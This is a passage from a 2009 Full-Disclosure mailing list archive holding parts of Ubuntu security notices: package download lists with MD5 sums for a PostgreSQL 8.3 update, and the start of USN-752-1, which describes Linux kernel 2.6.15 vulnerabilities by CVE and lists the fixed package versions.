  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libecpg-compat3_8.3.7-0ubuntu8.04.1_sparc.deb
      Size/MD5:     9846 6538e90c4beb982080b3b53ae6019906
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libecpg-dev_8.3.7-0ubuntu8.04.1_sparc.deb
      Size/MD5:   203108 cdda637bd3c38f9acd68ab04eb9d717a
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libecpg6_8.3.7-0ubuntu8.04.1_sparc.deb
      Size/MD5:    29596 62aaeeee973fd7f2b1b0d46e488b79b7
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libpgtypes3_8.3.7-0ubuntu8.04.1_sparc.deb
      Size/MD5:   258010 39dd3b16d92bd71c6fc492aa6f1e51a3
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libpq-dev_8.3.7-0ubuntu8.04.1_sparc.deb
      Size/MD5:   178590 52d22331e5fe53a49f4a395779d913ce
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libpq5_8.3.7-0ubuntu8.04.1_sparc.deb
      Size/MD5:   288832 3795c8fe8eddb9d92bc055915fc133cb
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-8.3_8.3.7-0ubuntu8.04.1_sparc.deb
      Size/MD5:  3846174 090d891682eaad24191cecbba74dbdec
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-client-8.3_8.3.7-0ubuntu8.04.1_sparc.deb
      Size/MD5:   703142 7fcacf4d8c0ca57fb482725bd2eab531
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.7-0ubuntu8.04.1_sparc.deb
      Size/MD5:   324186 ede7c224576f14a0554dcc4ca07a9a3e
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-plperl-8.3_8.3.7-0ubuntu8.04.1_sparc.deb
      Size/MD5:   258534 fe0f9ebc0a1ac5469e0a9f7e738b1384
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-plpython-8.3_8.3.7-0ubuntu8.04.1_sparc.deb
      Size/MD5:   250834 d41ae02d8eb77588a9eaa7aa7d44279f
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.7-0ubuntu8.04.1_sparc.deb
      Size/MD5:   249788 be39403ed75432aabaeadda143c62ca2
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.7-0ubuntu8.04.1_sparc.deb
      Size/MD5:   797266 e4ef7b3bd6451791ff884b16a35c032c

Updated packages for Ubuntu 8.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-8.3_8.3.7-0ubuntu8.10.1.diff.gz
      Size/MD5:    64352 15227cb392bff0b618803c327d7d2822
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-8.3_8.3.7-0ubuntu8.10.1.dsc
      Size/MD5:     1773 8c52a313b4e0b946260aa9aed93a7897
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-8.3_8.3.7.orig.tar.gz
      Size/MD5: 13814173 850f5e17f2d0a8272214ed75da4befc7

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-client_8.3.7-0ubuntu8.10.1_all.deb
      Size/MD5:   234730 c919741054714fc5307753b7b503961d
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-contrib_8.3.7-0ubuntu8.10.1_all.deb
      Size/MD5:   234628 3bcb69df41b5ca92b71c2f00859cd324
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-doc-8.3_8.3.7-0ubuntu8.10.1_all.deb
      Size/MD5:  1962622 44d8edc3cf49bee8a98e4a4ebdef932a
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-doc_8.3.7-0ubuntu8.10.1_all.deb
      Size/MD5:     3442 f1f8082d8753b60cb791b31f44ae6327
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql_8.3.7-0ubuntu8.10.1_all.deb
      Size/MD5:   234756 24050ddad7d808f459b0f9fb9d4352ba

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libecpg-compat3_8.3.7-0ubuntu8.10.1_amd64.deb
      Size/MD5:    11566 f90f8ebde8e3e13a78154266e422e9b3
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libecpg-dev_8.3.7-0ubuntu8.10.1_amd64.deb
      Size/MD5:   225244 b24a3838a40391e482947ccc41c3adf0
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libecpg6_8.3.7-0ubuntu8.10.1_amd64.deb
      Size/MD5:    32802 3384ebc510bd6fec907d1cbad1a9b469
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libpgtypes3_8.3.7-0ubuntu8.10.1_amd64.deb
      Size/MD5:   264714 8ff2607f797ad92c242eb957a9fcd7cb
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libpq-dev_8.3.7-0ubuntu8.10.1_amd64.deb
      Size/MD5:   192362 e6e4bcffddf2425bc712981db26fb300
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libpq5_8.3.7-0ubuntu8.10.1_amd64.deb
      Size/MD5:   300886 e44e307112bfe98a702c18cdc371b639
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-8.3_8.3.7-0ubuntu8.10.1_amd64.deb
      Size/MD5:  3809178 6890d7f66a1a031cb8c0162fda713572
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-client-8.3_8.3.7-0ubuntu8.10.1_amd64.deb
      Size/MD5:   767552 9a6e0535202e7f5dffa6fe38013d79c6
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.7-0ubuntu8.10.1_amd64.deb
      Size/MD5:   370390 54a1129bf8c8cbacc0c14c2fe725bc72
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-plperl-8.3_8.3.7-0ubuntu8.10.1_amd64.deb
      Size/MD5:   262268 cdb3945ceb7965b3786a092aa5d00082
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-plpython-8.3_8.3.7-0ubuntu8.10.1_amd64.deb
      Size/MD5:   256474 c225895dbefc4ef4cbca8a967b042ef4
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.7-0ubuntu8.10.1_amd64.deb
      Size/MD5:   254064 2cee641a54a608ad039ab5aea382ae0c
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.7-0ubuntu8.10.1_amd64.deb
      Size/MD5:   804706 1839632f461762abdb93e97d2af10426

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libecpg-compat3_8.3.7-0ubuntu8.10.1_i386.deb
      Size/MD5:    10718 7586c67a40de51d34e0ac18836c5f8be
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libecpg-dev_8.3.7-0ubuntu8.10.1_i386.deb
      Size/MD5:   215772 1b3553527d86f8e48103791d4598a540
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libecpg6_8.3.7-0ubuntu8.10.1_i386.deb
      Size/MD5:    32050 53b3a17587d49d37db14ff80e262fb0c
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libpgtypes3_8.3.7-0ubuntu8.10.1_i386.deb
      Size/MD5:   263912 3ed34e6c985c7a06d04c9e6cd11f977d
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libpq-dev_8.3.7-0ubuntu8.10.1_i386.deb
      Size/MD5:   184406 97c5da0dd63937bb45a72d440f0c820e
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libpq5_8.3.7-0ubuntu8.10.1_i386.deb
      Size/MD5:   296702 04238d6be4937edeb03dc08379969170
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-8.3_8.3.7-0ubuntu8.10.1_i386.deb
      Size/MD5:  3661880 7d47a4a11ce3f8ca6dcb5bdae9aaa0e9
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-client-8.3_8.3.7-0ubuntu8.10.1_i386.deb
      Size/MD5:   726604 242f6a16498411f512cae337cb107026
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.7-0ubuntu8.10.1_i386.deb
      Size/MD5:   333926 0446016c1ae0dc71c052934691881101
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-plperl-8.3_8.3.7-0ubuntu8.10.1_i386.deb
      Size/MD5:   260434 9d3aba8d657a1bbb4416892f67d7f8b2
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-plpython-8.3_8.3.7-0ubuntu8.10.1_i386.deb
      Size/MD5:   254188 4c571c52ca4070f06c56934e8bfb1766
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.7-0ubuntu8.10.1_i386.deb
      Size/MD5:   253174 088cec49870a60c127ab7f2e41d9bd6c
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.7-0ubuntu8.10.1_i386.deb
      Size/MD5:   800232 c22e28beba5063144bb334cbe37a0bed

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libecpg-compat3_8.3.7-0ubuntu8.10.1_lpia.deb
      Size/MD5:    10440 5c865203ea57791fe85a393402df552e
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libecpg-dev_8.3.7-0ubuntu8.10.1_lpia.deb
      Size/MD5:   215826 1bc269e1db418d43a4f258e6e16e73b9
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libecpg6_8.3.7-0ubuntu8.10.1_lpia.deb
      Size/MD5:    31256 19d564a3ecff128422be19d1ae9ecbde
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libpgtypes3_8.3.7-0ubuntu8.10.1_lpia.deb
      Size/MD5:   263510 652c276030f49c77da9fb7a92cfa4b08
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libpq-dev_8.3.7-0ubuntu8.10.1_lpia.deb
      Size/MD5:   181136 a1388c0159e33b81b17504d8b59a77fd
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libpq5_8.3.7-0ubuntu8.10.1_lpia.deb
      Size/MD5:   295548 710d9d08cf99419b635666db5fd36018
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-8.3_8.3.7-0ubuntu8.10.1_lpia.deb
      Size/MD5:  3639198 41af4369536badaf95a99d2a5f1c69d9
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-client-8.3_8.3.7-0ubuntu8.10.1_lpia.deb
      Size/MD5:   721528 bff1713dae62bbf3e23fd478299b5e75
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.7-0ubuntu8.10.1_lpia.deb
      Size/MD5:   330484 ed39c5b15376cae7f319576992b0f899
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-plperl-8.3_8.3.7-0ubuntu8.10.1_lpia.deb
      Size/MD5:   260754 0468439343137ba3793c84d2804f8829
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-plpython-8.3_8.3.7-0ubuntu8.10.1_lpia.deb
      Size/MD5:   254114 ec5728d45d8cc8042fa71e4f7e289273
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.7-0ubuntu8.10.1_lpia.deb
      Size/MD5:   253124 4e82fc1ca1d685089da8dcfcf56d9620
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.7-0ubuntu8.10.1_lpia.deb
      Size/MD5:   799682 b8852654547e9250c508c7fc5ec9d5ce

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libecpg-compat3_8.3.7-0ubuntu8.10.1_powerpc.deb
      Size/MD5:    11264 54db1887e1566549f09cb8bd2e669d52
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libecpg-dev_8.3.7-0ubuntu8.10.1_powerpc.deb
      Size/MD5:   223750 39304a9d4fcb0929d74a70b82b67cc86
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libecpg6_8.3.7-0ubuntu8.10.1_powerpc.deb
      Size/MD5:    33874 3839bc0f1a60516e5f75f36de85c2b22
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libpgtypes3_8.3.7-0ubuntu8.10.1_powerpc.deb
      Size/MD5:   266934 4e45631af16101a5ef71ece177c4b72d
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libpq-dev_8.3.7-0ubuntu8.10.1_powerpc.deb
      Size/MD5:   190714 6f44e3a40a6257a581f7b62126b75083
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libpq5_8.3.7-0ubuntu8.10.1_powerpc.deb
      Size/MD5:   299358 7ac3171037fb37b93e09dd2d468a38fa
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-8.3_8.3.7-0ubuntu8.10.1_powerpc.deb
      Size/MD5:  4176184 4d3857fa60617c88db9e160bf1432023
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-client-8.3_8.3.7-0ubuntu8.10.1_powerpc.deb
      Size/MD5:   796598 397858ce37cb119b1c33c958deb21350
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.7-0ubuntu8.10.1_powerpc.deb
      Size/MD5:   422070 5b474fbd4397a132bc4235ca743ceb6d
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-plperl-8.3_8.3.7-0ubuntu8.10.1_powerpc.deb
      Size/MD5:   263506 1f1f277fe1bc01af01523694b019ea65
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-plpython-8.3_8.3.7-0ubuntu8.10.1_powerpc.deb
      Size/MD5:   257996 fcf7488e402b357dac66bccd58ab0b6c
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.7-0ubuntu8.10.1_powerpc.deb
      Size/MD5:   256120 581e4f9bc8f0fbd1f143d24f1f5c0e43
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.7-0ubuntu8.10.1_powerpc.deb
      Size/MD5:   806486 f834b509ca9505ddd51dfeec19f1c604

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libecpg-compat3_8.3.7-0ubuntu8.10.1_sparc.deb
      Size/MD5:     9874 9eefb824de1a48196dae37018ef23a6e
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libecpg-dev_8.3.7-0ubuntu8.10.1_sparc.deb
      Size/MD5:   207546 1d87954c88990dc5f3e997857f02d1f6
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libecpg6_8.3.7-0ubuntu8.10.1_sparc.deb
      Size/MD5:    29450 5b06356543912c3a11a7a3cc95e0e84d
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libpgtypes3_8.3.7-0ubuntu8.10.1_sparc.deb
      Size/MD5:   260598 5b7c9c3b3e4d0fa7fe99b317dc611de5
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libpq-dev_8.3.7-0ubuntu8.10.1_sparc.deb
      Size/MD5:   179282 18d25e06f4d72699bffc97cd23116420
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libpq5_8.3.7-0ubuntu8.10.1_sparc.deb
      Size/MD5:   292016 90ef7249cebfb895259bb3d1b7a80f69
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-8.3_8.3.7-0ubuntu8.10.1_sparc.deb
      Size/MD5:  3903872 2940b13a99e97e53852219132d1250a3
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-client-8.3_8.3.7-0ubuntu8.10.1_sparc.deb
      Size/MD5:   720012 4ef63f9946cf868aa5476bbbab17fed6
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.7-0ubuntu8.10.1_sparc.deb
      Size/MD5:   329958 086c0cb840ce838f3cec9d8073ce41f3
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-plperl-8.3_8.3.7-0ubuntu8.10.1_sparc.deb
      Size/MD5:   258828 8fc2e796b2baa1277daa0f3160a5a4e9
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-plpython-8.3_8.3.7-0ubuntu8.10.1_sparc.deb
      Size/MD5:   253276 e648fcb5a67caf4f6586eb5dfa39872e
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.7-0ubuntu8.10.1_sparc.deb
      Size/MD5:   252236 bdcaaaf0eabe2a8abd7711aeb17995b2
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.7-0ubuntu8.10.1_sparc.deb
      Size/MD5:   800420 ab81e6e1ed392601afa180fe4cafc59f


-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 197 bytes
Desc: This is a digitally signed message part
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090407/811b6d85/attachment.bin 

From kees at ubuntu.com  Tue Apr  7 18:37:12 2009
From: kees at ubuntu.com (Kees Cook)
Date: Tue, 7 Apr 2009 10:37:12 -0700
Subject: [Full-disclosure] [USN-752-1] Linux kernel vulnerabilities
Message-ID: <20090407173712.GA7449@outflux.net>

===========================================================
Ubuntu Security Notice USN-752-1             April 07, 2009
linux-source-2.6.15 vulnerabilities
CVE-2008-4307, CVE-2008-6107, CVE-2009-0028, CVE-2009-0029,
CVE-2009-0065, CVE-2009-0322, CVE-2009-0675, CVE-2009-0676,
CVE-2009-0834, CVE-2009-0835, CVE-2009-0859
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  linux-image-2.6.15-54-386       2.6.15-54.76
  linux-image-2.6.15-54-686       2.6.15-54.76
  linux-image-2.6.15-54-amd64-generic  2.6.15-54.76
  linux-image-2.6.15-54-amd64-k8  2.6.15-54.76
  linux-image-2.6.15-54-amd64-server  2.6.15-54.76
  linux-image-2.6.15-54-amd64-xeon  2.6.15-54.76
  linux-image-2.6.15-54-hppa32    2.6.15-54.76
  linux-image-2.6.15-54-hppa32-smp  2.6.15-54.76
  linux-image-2.6.15-54-hppa64    2.6.15-54.76
  linux-image-2.6.15-54-hppa64-smp  2.6.15-54.76
  linux-image-2.6.15-54-itanium   2.6.15-54.76
  linux-image-2.6.15-54-itanium-smp  2.6.15-54.76
  linux-image-2.6.15-54-k7        2.6.15-54.76
  linux-image-2.6.15-54-mckinley  2.6.15-54.76
  linux-image-2.6.15-54-mckinley-smp  2.6.15-54.76
  linux-image-2.6.15-54-powerpc   2.6.15-54.76
  linux-image-2.6.15-54-powerpc-smp  2.6.15-54.76
  linux-image-2.6.15-54-powerpc64-smp  2.6.15-54.76
  linux-image-2.6.15-54-server    2.6.15-54.76
  linux-image-2.6.15-54-server-bigiron  2.6.15-54.76
  linux-image-2.6.15-54-sparc64   2.6.15-54.76
  linux-image-2.6.15-54-sparc64-smp  2.6.15-54.76

After a standard system upgrade you need to reboot your computer to
effect the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have
been given a new version number, which requires you to recompile and
reinstall all third party kernel modules you might have installed. If
you use linux-restricted-modules, you have to update that package as
well to get modules which work with the new kernel version. Unless you
manually uninstalled the standard kernel metapackages (e.g. linux-generic,
linux-server, linux-powerpc), a standard system upgrade will automatically
perform this as well.

Details follow:

NFS did not correctly handle races between fcntl and interrupts. A local
attacker on an NFS mount could consume unlimited kernel memory, leading to
a denial of service. (CVE-2008-4307)

Sparc syscalls did not correctly check mmap regions. A local attacker could
cause a system panic, leading to a denial of service. (CVE-2008-6107)

In certain situations, cloned processes were able to send signals to parent
processes, crossing privilege boundaries. A local attacker could send
arbitrary signals to parent processes, leading to a denial of service.
(CVE-2009-0028)

The 64-bit syscall interfaces did not correctly handle sign extension. A
local attacker could make malicious syscalls, possibly gaining root
privileges. The x86_64 architecture was not affected. (CVE-2009-0029)

The SCTP stack did not correctly validate FORWARD-TSN packets. A remote
attacker could send specially crafted SCTP traffic causing a system crash,
leading to a denial of service. (CVE-2009-0065)

The Dell platform device did not correctly validate user parameters. A
local attacker could perform specially crafted reads to crash the system,
leading to a denial of service. (CVE-2009-0322)

Network interfaces statistics for the SysKonnect FDDI driver did not check
capabilities. A local user could reset statistics, potentially interfering
with packet accounting systems. (CVE-2009-0675)

The getsockopt function did not correctly clear certain parameters. A local
attacker could read leaked kernel memory, leading to a loss of privacy.
(CVE-2009-0676)

The syscall interface did not correctly validate parameters when crossing
the 64-bit/32-bit boundary. A local attacker could bypass certain syscall
restricts via crafted syscalls. (CVE-2009-0834, CVE-2009-0835)

The shared memory subsystem did not correctly handle certain shmctl calls
when CONFIG_SHMEM was disabled. Ubuntu kernels were not vulnerable, since
CONFIG_SHMEM is enabled by default. (CVE-2009-0859)


Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15_2.6.15-54.12.dsc
      Size/MD5:     2657 789f39f1dd757bcb12fc4432b12edbdd
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15_2.6.15-54.12.tar.gz
      Size/MD5:   448038 675b62805cac20691a4de87a4176ae28
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-meta_2.6.15.55.dsc
      Size/MD5:     3423 48f0031e15f18b2abae6d43e4a2483d0
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-meta_2.6.15.55.tar.gz
      Size/MD5:    25738 9a68811357a73813f6e45e75c11d17bf
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-54.76.diff.gz
      Size/MD5:  3000038 82f56ac5a1aad1394899e4831066e614
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-54.76.dsc
      Size/MD5:     2438 e09172d130362ddc1eddd0dc105e1646
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15.orig.tar.gz
      Size/MD5: 57403387 88ab0747cb8c2ceed662e0fd1b27d81d
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15_2.6.15.12-54.5.diff.gz
      Size/MD5:    93910 899517b00e4a1ef7080da64e8dbf2968
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15_2.6.15.12-54.5.dsc
      Size/MD5:     3240 a123dd116cac895434e82077b0110f76
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15_2.6.15.12.orig.tar.gz
      Size/MD5: 97745908 fb5765cfa2b0fdb06deb54fd6e537772

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-doc_2.6.15.55_all.deb
      Size/MD5:    23678 e2ebd9fafee150e0772017cd1f9d3b4c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-source_2.6.15.55_all.deb
      Size/MD5:    23710 9f203ff4878ad5bf768db12cbc27a81d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-doc-2.6.15_2.6.15-54.76_all.deb
      Size/MD5:  5165954 11252fa0cd156f29e5b5d027fa401536
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-kernel-devel_2.6.15-54.76_all.deb
      Size/MD5:    95004 4434617119c34ce93c90d45982714a0e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-54.76_all.deb
      Size/MD5: 44744038 44ce4198f258ea21263720b922f5b465
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-common_2.6.15.12-54.5_all.deb
      Size/MD5:    18518 d98fd8d312413655cea0fcd22f1156d7

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-54-amd64-generic_2.6.15-54.12_amd64.deb
      Size/MD5:   165452 46f2cfbf60df6baf84651089c5ff9856
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-54-amd64-k8_2.6.15-54.12_amd64.deb
      Size/MD5:   165428 e3a2ea9cd57bb09465e243044557b48a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-54-amd64-server_2.6.15-54.12_amd64.deb
      Size/MD5:   165428 bcb9d2de478c199b7c7456ce307c99d7
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-54-amd64-xeon_2.6.15-54.12_amd64.deb
      Size/MD5:   156206 29d59e8919e8e785e5e5e600a6ed8944
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/nic-updates-modules-2.6.15-54-amd64-generic-di_2.6.15-54.12_amd64.udeb
      Size/MD5:    84694 9a97232dce810c1d76fa04211a657685
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/scsi-updates-modules-2.6.15-54-amd64-generic-di_2.6.15-54.12_amd64.udeb
      Size/MD5:    97412 21f2bcbc16539a6179125006e8e3c5f1
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-backports-modules-amd64-generic_2.6.15.55_amd64.deb
      Size/MD5:    23722 69016ddb7dee805bd1207b094411a5e7
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-backports-modules-amd64-k8_2.6.15.55_amd64.deb
      Size/MD5:    23718 6648da577bbac0e7dbda7ef4902c88f5
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-backports-modules-amd64-server_2.6.15.55_amd64.deb
      Size/MD5:    23726 d078dfc02b72af3692c7208c8d2eb855
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-backports-modules-amd64-xeon_2.6.15.55_amd64.deb
      Size/MD5:    23716 eb8c15c940b1d04bc4d49b7ffc219161
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-headers-amd64-generic_2.6.15.55_amd64.deb
      Size/MD5:    23736 23cd5bde5afce88dce082e6b119f9f98
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-headers-amd64-k8_2.6.15.55_amd64.deb
      Size/MD5:    23740 fd17262606dfe5dd9865ce7eafccee04
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-headers-amd64-server_2.6.15.55_amd64.deb
      Size/MD5:    23738 aa7b67ade0e4b8f824a6fc0f9921d9f2
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-headers-amd64-xeon_2.6.15.55_amd64.deb
      Size/MD5:    23732 95890221bb7402722f61e196df8a7a68
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-image-amd64-generic_2.6.15.55_amd64.deb
      Size/MD5:    23730 30d1db2af2fc23abe1cd5d516de0b493
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-image-amd64-k8_2.6.15.55_amd64.deb
      Size/MD5:    23734 eff0e2c67581e60ffcd87290d3d9454c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-image-amd64-server_2.6.15.55_amd64.deb
      Size/MD5:    23728 f9a82e0c3836250aae930d518b532f0b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-image-amd64-xeon_2.6.15.55_amd64.deb
      Size/MD5:    23730 0956781f45ba23b5eec2ccfb1f146183
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-54-amd64-generic-di_2.6.15-54.76_amd64.udeb
      Size/MD5:    22356 3a832b0ef3707e8e25b7a4cefcecd28f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-54-amd64-generic-di_2.6.15-54.76_amd64.udeb
      Size/MD5:    44770 9557e6d6100dd7a020b0eff4a260ff5c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-54-amd64-generic-di_2.6.15-54.76_amd64.udeb
      Size/MD5:     2308 14b8d27e804cbe29edb192dedbff0d0e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-54-amd64-generic-di_2.6.15-54.76_amd64.udeb
      Size/MD5:    36252 d8afef59fc8dec6a4edd42f35684cba4
